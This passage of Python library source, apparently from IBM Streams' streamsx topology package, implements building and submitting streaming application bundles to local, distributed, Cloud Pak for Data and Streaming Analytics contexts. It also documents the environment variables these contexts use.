context_submitter = _SubmitContextFactory(graph, config, username, password).get_submit_context(ctxtype)
sr = SubmissionResult(context_submitter.submit())
sr._submitter = context_submitter
return sr
def build(topology, config=None, dest=None, verify=None):
"""
Build a topology to produce a Streams application bundle.
Builds a topology using :py:func:`submit` with context type :py:const:`~ContextTypes.BUNDLE`. The result is a sab file on the local file system along
with a job config overlay file matching the application.
The build uses a build service or a local install, see :py:const:`~ContextTypes.BUNDLE` for details.
Args:
topology(Topology): Application topology to be built.
config(dict): Configuration for the build.
dest(str): Destination directory for the sab and JCO files. Default is context specific.
verify: SSL verification used by requests when using a build service. Defaults to enabling SSL verification.
Returns:
3-element tuple containing
- **bundle_path** (*str*): path to the bundle (sab file) or ``None`` if not created.
- **jco_path** (*str*): path to file containing the job config overlay for the application or ``None`` if not created.
- **result** (*SubmissionResult*): value returned from ``submit``.
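    Example (illustrative sketch; assumes a local IBM Streams install or a configured build service)::

        from streamsx.topology.topology import Topology
        from streamsx.topology.context import build

        topo = Topology('BundleApp')
        # ... declare streams on topo ...
        bundle_path, jco_path, result = build(topo, dest='.')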
.. seealso:: :py:const:`~ContextTypes.BUNDLE` for details on how to configure the build service to use.
.. versionadded:: 1.14
"""
if verify is not None:
config = config.copy() if config else dict()
config[ConfigParams.SSL_VERIFY] = verify
sr = submit(ContextTypes.BUNDLE, topology, config=config)
if 'bundlePath' in sr:
if dest:
bundle = sr['bundlePath']
bundle_dest = os.path.join(dest, os.path.basename(bundle))
if os.path.exists(bundle_dest): os.remove(bundle_dest)
shutil.move(bundle, dest)
sr['bundlePath'] = bundle_dest
jco = sr['jobConfigPath']
jco_dest = os.path.join(dest, os.path.basename(jco))
if os.path.exists(jco_dest): os.remove(jco_dest)
shutil.move(jco, dest)
sr['jobConfigPath'] = jco_dest
return sr['bundlePath'], sr['jobConfigPath'], sr
return None, None, sr
class _BaseSubmitter(object):
"""
    A submitter which handles submit operations common across all submitter types.
"""
def __init__(self, ctxtype, config, graph):
self.ctxtype = ctxtype
self.config = dict()
if config is not None:
# Make copy of config to avoid modifying
            # the caller's config
self.config.update(config)
# When SERVICE_DEFINITION is a String, it is assumed that
# it is JSON SAS credentials, which must be converted to a JSON object
service_def = self.config.get(ConfigParams.SERVICE_DEFINITION)
if service_def:
if isinstance(service_def, str):
self.config[ConfigParams.SERVICE_DEFINITION] = json.loads(service_def)
self.config['contextType'] = str(self.ctxtype)
if 'originator' not in self.config:
self.config['originator'] = 'topology-' + __version__ + ':python-' + platform.python_version()
self.graph = graph
self.fn = None
self.results_file = None
self.keepArtifacts = False
if 'topology.keepArtifacts' in self.config:
self.keepArtifacts = self.config.get('topology.keepArtifacts')
def _config(self):
"Return the submit configuration"
return self.config
def submit(self):
# Convert the JobConfig into overlays
self._create_job_config_overlays()
# encode the relevant python version information into the config
self._add_python_info()
# Create the json file containing the representation of the application
try:
self._create_json_file(self._create_full_json())
except IOError:
logger.error("Error writing json graph to file.")
raise
try:
return self._submit_exec()
finally:
if not self.keepArtifacts:
_delete_json(self)
def _submit_exec(self):
tk_root = self._get_toolkit_root()
cp = os.path.join(tk_root, "lib", "com.ibm.streamsx.topology.jar")
remote_context = False
streams_install = os.environ.get('STREAMS_INSTALL')
# If there is no streams install, get java from JAVA_HOME and use the remote contexts.
if streams_install is None:
java_home = os.environ.get('JAVA_HOME')
if java_home is None:
raise ValueError("JAVA_HOME not found. Please set the JAVA_HOME system variable")
jvm = os.path.join(java_home, "bin", "java")
remote_context = True
# Otherwise, use the Java version from the streams install
else:
jvm = os.path.join(streams_install, "java", "jre", "bin", "java")
if self.config.get(ConfigParams.FORCE_REMOTE_BUILD):
remote_context = True
cp = cp + ':' + os.path.join(streams_install, "lib", "com.ibm.streams.operator.samples.jar")
progress_fn = lambda _ : None
if remote_context:
submit_class = "com.ibm.streamsx.topology.context.remote.RemoteContextSubmit"
try:
                # Verify we are in an IPython env.
get_ipython() # noqa : F821
import ipywidgets as widgets
logger.debug("ipywidgets available - creating IntProgress")
progress_bar = widgets.IntProgress(
value=0,
min=0, max=10, step=1,
description='Initializing',
bar_style='info', orientation='horizontal',
style={'description_width':'initial'})
logger.debug("ipywidgets available - created IntProgress")
try:
display(progress_bar) # noqa : F821
def _show_progress(msg):
if msg is True:
progress_bar.value = progress_bar.max
progress_bar.bar_style = 'success'
return
if msg is False:
progress_bar.bar_style = 'danger'
return
msg = msg.split('-')
progress_bar.value += 1
progress_bar.description = msg[3]
progress_fn = _show_progress
except:
logger.debug("ipywidgets IntProgress error: %s", sys.exc_info()[1])
pass
except:
logger.debug("ipywidgets not available: %s", sys.exc_info()[1])
pass
else:
submit_class = "com.ibm.streamsx.topology.context.local.StreamsContextSubmit"
jul_cfg = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logging.properties')
jul = '-Djava.util.logging.config.file=' + jul_cfg
args = [jvm, '-classpath', cp, jul, submit_class, self.ctxtype, self.fn, str(logging.getLogger().getEffectiveLevel())]
logger.info("Generating SPL and submitting application.")
proc_env = self._get_java_env()
process = subprocess.Popen(args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0, env=proc_env)
stderr_thread = threading.Thread(target=_print_process_stderr, args=([process, self, progress_fn]))
stderr_thread.daemon = True
stderr_thread.start()
stdout_thread = threading.Thread(target=_print_process_stdout, args=([process]))
stdout_thread.daemon = True
stdout_thread.start()
process.wait()
results_json = {}
# Only try to read the results file if the submit was successful.
if process.returncode == 0:
with open(self.results_file) as _file:
try:
results_json = json.loads(_file.read())
progress_fn(True)
except IOError:
logger.error("Could not read file:" + str(_file.name))
progress_fn(False)
raise
except json.JSONDecodeError:
logger.error("Could not parse results file:" + str(_file.name))
progress_fn(False)
raise
except:
logger.error("Unknown error while processing results file.")
progress_fn(False)
raise
else:
progress_fn(False)
results_json['return_code'] = process.returncode
self._augment_submission_result(results_json)
self.submission_results = results_json
return results_json
def _augment_submission_result(self, submission_result):
"""Allow a subclass to augment a submission result"""
pass
def _get_java_env(self):
"Get the environment to be passed to the Java execution"
return os.environ.copy()
def _add_python_info(self):
# Python information added to deployment
pi = {}
pi["prefix"] = sys.exec_prefix
pi["version"] = sys.version
pi['major'] = sys.version_info.major
pi['minor'] = sys.version_info.minor
self.config["python"] = pi
def _create_job_config_overlays(self):
if ConfigParams.JOB_CONFIG in self.config:
jco = self.config[ConfigParams.JOB_CONFIG]
del self.config[ConfigParams.JOB_CONFIG]
jco._add_overlays(self.config)
def _create_full_json(self):
fj = dict()
# Removing Streams Connection object because it is not JSON serializable, and not applicable for submission
# Need to re-add it, since the StreamsConnection needs to be returned from the submit.
sc = self.config.pop(ConfigParams.STREAMS_CONNECTION, None)
fj["deploy"] = self.config.copy()
fj["graph"] = self.graph.generateSPLGraph()
_file = tempfile.NamedTemporaryFile(prefix="results", suffix=".json", mode="w+t", delete=False)
_file.close()
fj["submissionResultsFile"] = _file.name
self.results_file = _file.name
logger.debug("Results file created at " + _file.name)
if sc is not None:
self.config[ConfigParams.STREAMS_CONNECTION] = sc
return fj
def _create_json_file(self, fj):
if sys.hexversion < 0x03000000:
tf = tempfile.NamedTemporaryFile(mode="w+t", suffix=".json", prefix="splpytmp", delete=False)
else:
tf = tempfile.NamedTemporaryFile(mode="w+t", suffix=".json", encoding="UTF-8", prefix="splpytmp",
delete=False)
tf.write(json.dumps(fj, sort_keys=True, indent=2, separators=(',', ': ')))
tf.close()
self.fn = tf.name
def _setup_views(self):
# Link each view back to this context.
for view in self.graph._views:
view.stop_data_fetch()
view._submit_context = self
def streams_connection(self):
raise NotImplementedError("Views require submission to DISTRIBUTED or ANALYTICS_SERVICE context")
# There are two modes for execution.
#
# Pypi (Python focused)
# Pypi (pip install) package includes the SPL toolkit as
# streamsx/.toolkit/com.ibm.streamsx.topology
# However the streamsx Python packages have been moved out
# of the toolkit's (opt/python/package) compared
# to the original toolkit layout. They are moved to the
# top level of the pypi package.
#
# SPL Toolkit (SPL focused):
# Streamsx Python packages are executed from opt/python/packages
#
# This function determines the root of the SPL toolkit based
    # upon the existence of the '.toolkit' directory.
#
@staticmethod
def _get_toolkit_root():
# Directory of this file (streamsx/topology)
dir = os.path.dirname(os.path.abspath(__file__))
# This is streamsx
dir = os.path.dirname(dir)
# See if .toolkit exists, if so executing from
# a pip install
tk_root = os.path.join(dir, '.toolkit', 'com.ibm.streamsx.topology')
if os.path.isdir(tk_root):
return tk_root
# Else dir is tk/opt/python/packages/streamsx
dir = os.path.dirname(dir)
dir = os.path.dirname(dir)
dir = os.path.dirname(dir)
tk_root = os.path.dirname(dir)
return tk_root
class _StreamingAnalyticsSubmitter(_BaseSubmitter):
"""
    A submitter which supports the ANALYTICS_SERVICE (Streaming Analytics service) context.
"""
    # Maintains, per service, the last time (in ms since epoch) a thread saw
    # the service running. Allows avoidance of status checks when we are
    # somewhat confident the service is running, e.g. during test runs or
    # repeated submissions.
_SERVICE_ACTIVE = threading.local()
def __init__(self, ctxtype, config, graph):
super(_StreamingAnalyticsSubmitter, self).__init__(ctxtype, config, graph)
self._streams_connection = self._config().get(ConfigParams.STREAMS_CONNECTION)
if ConfigParams.SERVICE_DEFINITION in self._config():
# Convert the service definition to a VCAP services definition.
# Which is then passed through to Java as a VCAP_SERVICES env var
# Service name matching the generated VCAP is passed through config.
service_def = self._config().get(ConfigParams.SERVICE_DEFINITION)
self._vcap_services = _vcap_from_service_definition(service_def)
self._config()[ConfigParams.SERVICE_NAME] = _name_from_service_definition(service_def)
else:
self._vcap_services = self._config().get(ConfigParams.VCAP_SERVICES)
self._service_name = self._config().get(ConfigParams.SERVICE_NAME)
if self._streams_connection is not None:
if not isinstance(self._streams_connection, streamsx.rest.StreamingAnalyticsConnection):
raise ValueError("config must contain a StreamingAnalyticsConnection object when submitting to "
"{} context".format(ctxtype))
# Use credentials stored within StreamingAnalyticsConnection
self._service_name = self._streams_connection.service_name
self._vcap_services = {'streaming-analytics': [
{'name': self._service_name, 'credentials': self._streams_connection.credentials}
]}
self._config()[ConfigParams.SERVICE_NAME] = self._service_name
# TODO: Compare credentials between the config and StreamsConnection, verify they are the same
# Clear the VCAP_SERVICES key in config, since env var will contain the content
self._config().pop(ConfigParams.VCAP_SERVICES, None)
self._config().pop(ConfigParams.SERVICE_DEFINITION, None)
self._setup_views()
self._job = None
def _create_full_json(self):
fj = super(_StreamingAnalyticsSubmitter, self)._create_full_json()
if hasattr(_StreamingAnalyticsSubmitter._SERVICE_ACTIVE, 'running'):
rts = _StreamingAnalyticsSubmitter._SERVICE_ACTIVE.running
if self._service_name in rts:
sn = self._service_name if self._service_name else os.environ['STREAMING_ANALYTICS_SERVICE_NAME']
fj['deploy']['serviceRunningTime'] = rts[sn]
return fj
def _job_access(self):
if self._job:
return self._job
if self._streams_connection is None:
self._streams_connection = streamsx.rest.StreamingAnalyticsConnection(self._vcap_services, self._service_name)
self._job = self._streams_connection.get_instances()[0].get_job(
id=self.submission_results['jobId'])
return self._job
def _augment_submission_result(self, submission_result):
vcap = streamsx.rest._get_vcap_services(self._vcap_services)
credentials = streamsx.rest._get_credentials(vcap, self._service_name)
if streamsx.rest_primitives._IAMConstants.V2_REST_URL in credentials:
instance_id = credentials[streamsx.rest_primitives._IAMConstants.V2_REST_URL].split('streaming_analytics/', 1)[1]
else:
instance_id = credentials['jobs_path'].split('/service_instances/', 1)[1].split('/', 1)[0]
submission_result['instanceId'] = instance_id
if 'jobId' in submission_result:
if not hasattr(_StreamingAnalyticsSubmitter._SERVICE_ACTIVE, 'running'):
_StreamingAnalyticsSubmitter._SERVICE_ACTIVE.running = dict()
sn = self._service_name if self._service_name else os.environ['STREAMING_ANALYTICS_SERVICE_NAME']
_StreamingAnalyticsSubmitter._SERVICE_ACTIVE.running[sn] = int(time.time() * 1000.0)
def _get_java_env(self):
"Pass the VCAP through the environment to the java submission"
env = super(_StreamingAnalyticsSubmitter, self)._get_java_env()
vcap = streamsx.rest._get_vcap_services(self._vcap_services)
env['VCAP_SERVICES'] = json.dumps(vcap)
return env
class _BundleSubmitter(_BaseSubmitter):
"""
A submitter which supports the BUNDLE context
including remote build.
"""
def __init__(self, ctxtype, config, graph):
_BaseSubmitter.__init__(self, ctxtype, config, graph)
self._remote = config.get(ConfigParams.FORCE_REMOTE_BUILD)
if not self._remote and 'STREAMS_INSTALL' in os.environ:
return
self._streams_connection = config.get(ConfigParams.STREAMS_CONNECTION)
if self._streams_connection is not None:
pass
else:
# Look for a service definition
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if not svc_info:
# Look for endpoint set by env vars.
inst = streamsx.rest_primitives.Instance.of_endpoint(verify=config.get(ConfigParams.SSL_VERIFY))
if inst is not None:
self._streams_connection = inst.rest_client._sc
if isinstance(self._streams_connection, streamsx.rest.StreamsConnection):
if isinstance(self._streams_connection.session.auth, streamsx.rest_primitives._ICPDExternalAuthHandler):
svc_info = self._streams_connection.session.auth._cfg
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
if self._streams_connection.session.verify == False:
self._config()[ConfigParams.SSL_VERIFY] = False
else:
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if svc_info:
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
streamsx.rest_primitives.Instance._clear_service_info(self._config())
def _get_java_env(self):
"Set env vars from connection if set"
env = super(_BundleSubmitter, self)._get_java_env()
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
if self._remote:
env.pop('STREAMS_INSTALL', None)
return env
class _EdgeSubmitter(_BaseSubmitter):
"""
A submitter which supports the EDGE context (force remote build).
"""
def __init__(self, ctxtype, config, graph):
_BaseSubmitter.__init__(self, ctxtype, config, graph)
config[ConfigParams.FORCE_REMOTE_BUILD] = True # EDGE is always remote build
self._remote = config.get(ConfigParams.FORCE_REMOTE_BUILD)
self._streams_connection = config.get(ConfigParams.STREAMS_CONNECTION)
if self._streams_connection is not None:
pass
else:
# Look for a service definition
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if not svc_info:
# Look for endpoint set by env vars.
inst = streamsx.rest_primitives.Instance.of_endpoint(verify=config.get(ConfigParams.SSL_VERIFY))
if inst is not None:
self._streams_connection = inst.rest_client._sc
if isinstance(self._streams_connection, streamsx.rest.StreamsConnection):
if isinstance(self._streams_connection.session.auth, streamsx.rest_primitives._ICPDExternalAuthHandler):
svc_info = self._streams_connection.session.auth._cfg
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
if self._streams_connection.session.verify == False:
self._config()[ConfigParams.SSL_VERIFY] = False
else:
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if svc_info:
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
streamsx.rest_primitives.Instance._clear_service_info(self._config())
# check that serviceBuildPoolsEndpoint is set
try:
serviceBuildPoolsEndpoint = self._config()[ConfigParams.SERVICE_DEFINITION]['connection_info']['serviceBuildPoolsEndpoint']
except KeyError:
raise RuntimeError('Build service is not configured for EDGE submission')
def _get_java_env(self):
"Set env vars from connection if set"
env = super(_EdgeSubmitter, self)._get_java_env()
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
if self._remote:
env.pop('STREAMS_INSTALL', None)
return env
def _get_distributed_submitter(config, graph, username, password):
# CP4D integrated environment and within project
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if svc_info:
return _DistributedSubmitterCP4DIntegratedProject(config, graph, svc_info)
# CP4D integrated environment external to project
if 'CP4D_URL' in os.environ and \
'STREAMS_INSTANCE_ID' in os.environ and \
'STREAMS_PASSWORD' in os.environ:
return _DistributedSubmitterCP4DIntegrated(config, graph)
# CP4D standalone environment
if 'STREAMS_REST_URL' in os.environ and \
'STREAMS_PASSWORD' in os.environ:
return _DistributedSubmitterCP4DStandalone(config, graph)
# Streams 4.2/4.3 by connection
if 'STREAMS_INSTALL' in os.environ and \
'STREAMS_INSTANCE_ID' in os.environ and \
ConfigParams.STREAMS_CONNECTION in config and \
isinstance(config[ConfigParams.STREAMS_CONNECTION], streamsx.rest.StreamsConnection):
return _DistributedSubmitter4Conn(config, graph, username, password)
# Streams 4.2/4.3 by environment
if 'STREAMS_INSTALL' in os.environ and \
'STREAMS_DOMAIN_ID' in os.environ and \
'STREAMS_INSTANCE_ID' in os.environ:
return _DistributedSubmitter4(config, graph, username, password)
raise RuntimeError('Insufficient configuration for DISTRIBUTED submission')
class _DistributedSubmitter(_BaseSubmitter):
"""
A submitter which supports the DISTRIBUTED context.
Sub-classed for specific configurations
"""
def __init__(self, config, graph, username, password):
super(_DistributedSubmitter, self).__init__(ContextTypes.DISTRIBUTED, config, graph)
self._streams_connection = None
self.username = username
self.password = password
self._job = None
# Give each view in the app the necessary information to connect to SWS.
self._setup_views()
def _job_access(self):
if self._job:
return self._job
instance = self._get_instance()
self._job = instance.get_job(id=self.submission_results['jobId'])
return self._job
class _DistributedSubmitterCP4DIntegratedProject(_DistributedSubmitter):
"""
A submitter which supports the CPD integrated configuration
within a project.
"""
def __init__(self, config, graph, svc_info):
super(_DistributedSubmitterCP4DIntegratedProject, self).__init__(config, graph, None, None)
# use the config here rather than svc_info as the config contains SSL_VERIFY
streams_instance = streamsx.rest_primitives.Instance.of_service(config)
if hasattr(streams_instance, 'productVersion'):
svc_info['productVersion'] = streams_instance.productVersion
# when we use the REST-API of the CP4D from inside the CP4D (Notebook in a project)
# we go over this URL: https://internal-nginx-svc:12443
svc_info['cluster_ip'] = 'internal-nginx-svc'
svc_info['cluster_port'] = 12443
        # a user-provided CP4D URL overrides the hard-coded values above
if ConfigParams.CP4D_URL in config:
userUrl = config[ConfigParams.CP4D_URL]
if userUrl:
es = up.urlparse(userUrl)
if ':' in es.netloc:
cluster_ip = es.netloc.split(':')[0]
cluster_port = es.netloc.split(':')[1]
else:
cluster_ip = es.netloc
cluster_port = 443
svc_info['cluster_ip_orig'] = svc_info['cluster_ip']
svc_info['cluster_port_orig'] = svc_info['cluster_port']
svc_info['cluster_ip'] = cluster_ip
svc_info['cluster_port'] = cluster_port
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
self._config()[ConfigParams.FORCE_REMOTE_BUILD] = True
streamsx.rest_primitives.Instance._clear_service_info(self._config())
def _get_instance(self):
return streamsx.rest_primitives.Instance.of_service(self._config())
def _get_java_env(self):
env = super(_DistributedSubmitterCP4DIntegratedProject, self)._get_java_env()
env.pop('CP4D_URL', None)
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
env.pop('STREAMS_INSTALL', None)
return env
class _DistributedSubmitterCP4DIntegrated(_DistributedSubmitter):
"""
A submitter which supports the CPD integrated configuration
outside a project.
"""
def __init__(self, config, graph):
super(_DistributedSubmitterCP4DIntegrated, self).__init__(config, graph, None, None)
# Look for endpoint set by env vars.
self._inst = streamsx.rest_primitives.Instance.of_endpoint(verify=config.get(ConfigParams.SSL_VERIFY))
if self._inst is None:
raise ValueError("Incorrect configuration for Cloud Pak for Data integrated configuration")
self._streams_connection = self._inst.rest_client._sc
svc_info = self._streams_connection.session.auth._cfg
if hasattr(self._inst, 'productVersion'):
svc_info['productVersion'] = self._inst.productVersion
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
self._config()[ConfigParams.FORCE_REMOTE_BUILD] = True
def _get_instance(self):
return self._inst
def _get_java_env(self):
env = super(_DistributedSubmitterCP4DIntegrated, self)._get_java_env()
env.pop('CP4D_URL', None)
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
env.pop('STREAMS_INSTALL', None)
return env
class _DistributedSubmitterCP4DStandalone(_DistributedSubmitter):
"""
A submitter which supports the CPD standalone configuration.
"""
def __init__(self, config, graph):
super(_DistributedSubmitterCP4DStandalone, self).__init__(config, graph, None, None)
# Look for endpoint set by env vars.
self._inst = streamsx.rest_primitives.Instance.of_endpoint(verify=config.get(ConfigParams.SSL_VERIFY))
if self._inst is None:
raise ValueError("Incorrect configuration for Cloud Pak for Data standalone configuration")
self._streams_connection = self._inst.rest_client._sc
self._config()[ConfigParams.FORCE_REMOTE_BUILD] = True
def _get_instance(self):
return self._inst
def _get_java_env(self):
env = super(_DistributedSubmitterCP4DStandalone, self)._get_java_env()
env.pop('CP4D_URL', None)
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
env.pop('STREAMS_INSTALL', None)
return env
class _DistributedSubmitter4(_DistributedSubmitter):
"""
A submitter which supports the DISTRIBUTED context
for IBM Streams 4.2/4.3.
"""
def __init__(self, config, graph, username, password):
super(_DistributedSubmitter4, self).__init__(config, graph, username, password)
def _get_instance(self):
if not self._streams_connection:
self._streams_connection = streamsx.rest.StreamsConnection(self.username, self.password)
if ConfigParams.SSL_VERIFY in self._config():
self._streams_connection.session.verify = self._config()[ConfigParams.SSL_VERIFY]
return self._streams_connection.get_instance(os.environ['STREAMS_INSTANCE_ID'])
class _DistributedSubmitter4Conn(_DistributedSubmitter4):
"""
A submitter which supports the DISTRIBUTED context
for IBM Streams 4.2/4.3 using a connection.
"""
def __init__(self, config, graph, username, password):
super(_DistributedSubmitter4Conn, self).__init__(config, graph, username, password)
self._streams_connection = config.get(ConfigParams.STREAMS_CONNECTION)
self.username = self._streams_connection.session.auth[0]
self.password = self._streams_connection.session.auth[1]
if (username is not None and username != self.username) or (password is not None and password != self.password):
            raise RuntimeError('Credentials supplied in the arguments differ from '
'those specified in the StreamsConnection object')
def _get_instance(self):
iid = os.environ.get('STREAMS_INSTANCE_ID')
return self._streams_connection.get_instance(id=iid)
def _get_java_env(self):
env = super(_DistributedSubmitter4Conn, self)._get_java_env()
        # Need to make sure the environment matches the connection.
sc = self._streams_connection
env['STREAMS_DOMAIN_ID'] = sc.get_domains()[0].id
return env
class _SubmitContextFactory(object):
"""
ContextSubmitter:
Responsible for performing the correct submission depending on a number of factors, including: the
presence/absence of a streams install, the type of context, and whether the user seeks to retrieve data via rest
"""
def __init__(self, graph, config=None, username=None, password=None):
self.graph = graph
self.config = config
self.username = username
self.password = password
if self.config is None:
self.config = {}
def get_submit_context(self, ctxtype):
# If there is no streams install present, currently only ANALYTICS_SERVICE, TOOLKIT, and BUILD_ARCHIVE
# are supported.
streams_install = os.environ.get('STREAMS_INSTALL')
if streams_install is None:
if ctxtype == ContextTypes.STANDALONE:
                raise ValueError(ctxtype + " can only be submitted when an IBM Streams install is present.")
if ctxtype == ContextTypes.DISTRIBUTED:
logger.debug("Selecting the DISTRIBUTED context for submission")
return _get_distributed_submitter(self.config, self.graph, self.username, self.password)
elif ctxtype == ContextTypes.STREAMING_ANALYTICS_SERVICE:
logger.debug("Selecting the STREAMING_ANALYTICS_SERVICE context for submission")
ctxtype = ContextTypes.STREAMING_ANALYTICS_SERVICE
return _StreamingAnalyticsSubmitter(ctxtype, self.config, self.graph)
elif ctxtype == 'BUNDLE':
logger.debug("Selecting the BUNDLE context for submission")
if 'CP4D_URL' in os.environ:
return _BundleSubmitter(ctxtype, self.config, self.graph)
if 'VCAP_SERVICES' in os.environ or \
ConfigParams.VCAP_SERVICES in self.config or \
ConfigParams.SERVICE_DEFINITION in self.config:
sbs = _SasBundleSubmitter(self.config, self.graph)
if sbs._remote:
return sbs
return _BundleSubmitter(ctxtype, self.config, self.graph)
elif ctxtype == 'EDGE':
logger.debug("Selecting the EDGE context for submission")
return _EdgeSubmitter(ctxtype, self.config, self.graph)
elif ctxtype == 'EDGE_BUNDLE':
logger.debug("Selecting the EDGE_BUNDLE context for submission")
return _EdgeSubmitter(ctxtype, self.config, self.graph)
else:
logger.debug("Using the BaseSubmitter, and passing the context type through to java.")
return _BaseSubmitter(ctxtype, self.config, self.graph)
# Used to delete the JSON file after it is no longer needed.
def _delete_json(submitter):
for fn in [submitter.fn, submitter.results_file]:
if fn and os.path.isfile(fn):
os.remove(fn)
# Used by a thread which polls a subprocess's stdout and writes it to stdout
def _print_process_stdout(process):
try:
while True:
line = process.stdout.readline()
if len(line) == 0:
process.stdout.close()
break
line = line.decode("utf-8").strip()
print(line)
except:
logger.error("Error reading from Java subprocess stdout stream.")
raise
finally:
process.stdout.close()
_JAVA_LOG_LVL = {
# java.util.logging
'SEVERE': logging.ERROR,
'WARNING': logging.WARNING,
'INFO':logging.INFO, 'CONFIG':logging.INFO,
    'FINE':logging.DEBUG, 'FINER':logging.DEBUG, 'FINEST':logging.DEBUG,
'FATAL': logging.CRITICAL,
'ERROR': logging.ERROR,
    'DEBUG':logging.DEBUG, 'TRACE':logging.DEBUG
}
# Used by a thread which polls a subprocess's stderr and writes it to
# a logger or stderr
def _print_process_stderr(process, submitter, progress_fn):
try:
while True:
line = process.stderr.readline()
if len(line) == 0:
process.stderr.close()
break
line = line.decode("utf-8").strip()
em = line.rstrip().split(': ', 1)
if len(em) == 2 and em[0] in _JAVA_LOG_LVL:
if 'INFO' == em[0] and em[1].startswith('!!-streamsx-'):
progress_fn(em[1])
continue
logger.log(_JAVA_LOG_LVL[em[0]], em[1])
continue
print(line, file=sys.stderr)
except:
logger.error("Error reading from Java subprocess stderr stream.")
raise
finally:
process.stderr.close()
class ContextTypes(object):
"""
Submission context types.
A :py:class:`~streamsx.topology.topology.Topology` is submitted using :py:func:`submit` and a context type.
    Submission of a `Topology` generally builds the application into a Streams application
bundle (sab) file and then submits it for execution in the required context.
The Streams application bundle contains all the artifacts required by an application such
that it can be executed remotely (e.g. on a Streaming Analytics service), including
distributing the execution of the application across multiple resources (hosts).
The context type defines which context is used for submission.
The main context types result in a running application and are:
* :py:const:`STREAMING_ANALYTICS_SERVICE` - Application is submitted to a Streaming Analytics service running on IBM Cloud.
* :py:const:`DISTRIBUTED` - Application is submitted to an IBM Streams instance.
* :py:const:`STANDALONE` - Application is executed as a local process, IBM Streams `standalone` application. Typically this is used during development or testing.
The :py:const:`BUNDLE` context type compiles the application (`Topology`) to produce a
Streams application bundle (sab file). The bundle is not executed but may subsequently be submitted
to a Streaming Analytics service or an IBM Streams instance. A bundle may be submitted multiple
times to services or instances, each resulting in a unique job (running application).
"""
STREAMING_ANALYTICS_SERVICE = 'STREAMING_ANALYTICS_SERVICE'
"""Submission to Streaming Analytics service running on IBM Cloud.
The `Topology` is compiled and the resultant Streams application bundle
(sab file) is submitted for execution on the Streaming Analytics service.
When **STREAMS_INSTALL** is not set or the :py:func:`submit` `config` parameter has
:py:const:`~ConfigParams.FORCE_REMOTE_BUILD` set to `True` the compilation of the application
occurs remotely by the service. This allows creation and submission of Streams applications
without a local install of IBM Streams.
When **STREAMS_INSTALL** is set and the :py:func:`submit` `config` parameter has
:py:const:`~ConfigParams.FORCE_REMOTE_BUILD` set to `False` or not set then the creation of the
Streams application bundle occurs locally and the bundle is submitted for execution on the service.
Environment variables:
These environment variables define how the application is built and submitted.
    * **STREAMS_INSTALL** - (optional) Location of an IBM Streams installation (4.0.1 or later). The install must be running on RedHat/CentOS 7 and `x86_64` architecture.
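    Example (illustrative sketch; service credentials are assumed to be available via
    **VCAP_SERVICES** or the :py:const:`~ConfigParams.VCAP_SERVICES` key)::

        from streamsx.topology.topology import Topology
        from streamsx.topology.context import submit, ContextTypes

        topo = Topology('ServiceApp')
        # ... declare streams on topo ...
        submit(ContextTypes.STREAMING_ANALYTICS_SERVICE, topo, config={})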
"""
DISTRIBUTED = 'DISTRIBUTED'
"""Submission to an IBM Streams instance.
    .. rubric:: IBM Cloud Pak for Data integrated configuration
*Projects (within cluster)*
The `Topology` is compiled using the Streams build service and submitted
    to a Streams service instance running in the same Cloud Pak for
Data cluster as the Jupyter notebook or script declaring the application.
The instance is specified in the configuration passed into :py:func:`submit`. The code that selects a service instance by name is::
from icpd_core import icpd_util
cfg = icpd_util.get_service_instance_details(name='instanceName', instance_type="streams")
topo = Topology()
...
submit(ContextTypes.DISTRIBUTED, topo, cfg)
The resultant `cfg` dict may be augmented with other values such as
a :py:class:`JobConfig` or keys from :py:class:`ConfigParams`.
*External to cluster or project*
The `Topology` is compiled using the Streams build service and submitted
to a Streams service instance running in Cloud Pak for Data.
Environment variables:
These environment variables define how the application is built and submitted.
* **CP4D_URL** - Cloud Pak for Data deployment URL, e.g. `https://cp4d_server:31843`
* **STREAMS_INSTANCE_ID** - Streams service instance name.
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
.. rubric:: IBM Cloud Pak for Data standalone configuration
The `Topology` is compiled using the Streams build service and submitted
to a Streams service instance using REST apis.
Environment variables:
These environment variables define how the application is built and submitted.
* **STREAMS_BUILD_URL** - Streams build service URL, e.g. when the service is exposed as node port: `https://<NODE-IP>:<NODE-PORT>`
* **STREAMS_REST_URL** - Streams SWS service (REST API) URL, e.g. when the service is exposed as node port: `https://<NODE-IP>:<NODE-PORT>`
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
.. rubric:: IBM Streams on-premise 4.2 & 4.3
The `Topology` is compiled locally and the resultant Streams application bundle
(sab file) is submitted to an IBM Streams instance.
Environment variables:
These environment variables define how the application is built and submitted.
    * **STREAMS_INSTALL** - Location of an IBM Streams installation (4.2 or 4.3).
* **STREAMS_DOMAIN_ID** - Domain identifier for the Streams instance.
* **STREAMS_INSTANCE_ID** - Instance identifier.
* **STREAMS_ZKCONNECT** - (optional) ZooKeeper connection string for domain (when not using an embedded ZooKeeper)
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
.. warning::
``streamtool`` is used to submit the job with on-premise 4.2 & 4.3 Streams and requires that ``streamtool`` does not prompt for authentication. This is achieved by using ``streamtool genkey``.
.. seealso::
